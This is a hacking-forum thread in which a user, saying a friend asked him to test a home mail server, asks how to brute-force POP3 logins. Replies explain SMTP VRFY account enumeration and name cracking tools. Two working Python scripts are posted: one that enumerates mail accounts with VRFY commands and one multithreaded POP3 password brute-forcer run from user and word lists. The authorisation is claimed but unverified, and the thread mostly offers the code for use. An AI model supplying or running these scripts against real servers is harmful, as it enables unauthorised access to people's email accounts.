Jump to content

Brute Force pop3


unixpro
 Share

Recommended Posts

I was wondering if anyone has done , or knows were to point me in the right direction. My mate has setup a email server @ his house and wants me to test it eg metaspoilt so forth , but i have never done brute force email attacks. I guess you use a dictonary attack , but how do you get a list of email accounts on that server ?

Cheers

Link to comment
Share on other sites

how do you get a list of email accounts on that server ?

have a look at smtp enumeration techniques

if the server allows VRFY you can brute force the email accounts.

write a script that takes a list of names (joe,jim,jon) and then tags the domain to it (@blogs.com)

then VRFY against the server

What server is he using ?

Link to comment
Share on other sites

I think Brutus can conduct a bruteforce attack against POP3.

Correct me if I'm wrong but a bruteforce attack and a dictionary attack is two diffrent things.

Bruteforce - try every combination of a certain number of characters

Dictionary - uses wordlists to try passwords

I think there is an old python script called GooMail previously included in the BT2 suite which used some google parameters to filter out mail adresses based on a certain domain.

Good luck!

/gEEEk :)

Link to comment
Share on other sites

Correct me if I'm wrong but a bruteforce attack and a dictionary attack is two diffrent things.

You are sorta right, IMO. Both of them are throwing shit at the wall to see what sticks so either way you are trying to brute force it, only with a dictionary you have a predefined set of words. Depending on what he is running as the POP3 server it shouldnt be that hard. Admin, HISNAME, CONTACT @whatever.com. A bruteforce attack is going to do some stupid shit and get picked up fairly quickly with a decent IDS. Go with a word list, and Python.

Link to comment
Share on other sites

Yeah i tryed a python script , for dictionary attack to get usernames but i was un-successfull due to vrfy being disabled. i might try some other methods tonight

i used this

#!/usr/bin/python

import socket

import sys

import fileinput

if len(sys.argv) !=2:

print "Usage: <inputfile>"

sys.exit(0)

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('xx.xxx.xx.xxx',25))

banner=s.recv(1024)

print banner

for line in fileinput.input():

s.send('VRFY '+line)

result=s.recv(1024)

print result

s.close()

it worked but dam server had vrfy disabled , anyone know some other methods ? , otherwise ill try some brute force

Link to comment
Share on other sites

Have you scanned the host with nmap? Are there other services running? Here is your code

#!usr/bin/python
#Pop3 Brute Forcer
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./popbrute.py &lt;server&gt; &lt;userlist&gt; &lt;wordlist&gt;"
    sys.exit(1)

try:
      users = open(sys.argv[2], "r").readlines()
except(IOError): 
      print "Error: Check your userlist path\n"
      sys.exit(1)
  
try:
      words = open(sys.argv[3], "r").readlines()
except(IOError): 
      print "Error: Check your wordlist path\n"
      sys.exit(1)
    
try:
    pop = poplib.POP3(sys.argv[1])
    welcome = pop.getwelcome()
    pop.quit()
except (poplib.error_proto): 
    welcome = "No Response"
    pass

print "\n\t   d3hydr8[at]gmail[dot]com popBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"

wordlist = copy(words)

def reloader():
    for word in wordlist:
        words.append(word)

def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words,  1)
        words.remove(value[0])
        
    else:
        print "Reloading Wordlist - Changing User\n"
        reloader()
        value = random.sample(words,  1)
        users.remove(users[0])
        
    lock.release()
    return value[0][:-1], users[0][:-1]
        
class Worker(threading.Thread):
    
    def run(self):
        value, user = getword()
        try:
            print "-"*12
            print "User:",user,"Password:",value
            pop = poplib.POP3(sys.argv[1])
            pop.user(user)
            pop.pass_(value)
            print "\t\nLogin successful:",value, user
            print pop.stat()
            pop.quit()
            work.join()
            sys.exit(2)
        except (poplib.error_proto), msg: 
            #print "An error occurred:", msg
            pass

for i in range(len(words)*len(users)):
    work = Worker()
    work.start()
    time.sleep(1)

Link to comment
Share on other sites

  • 4 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...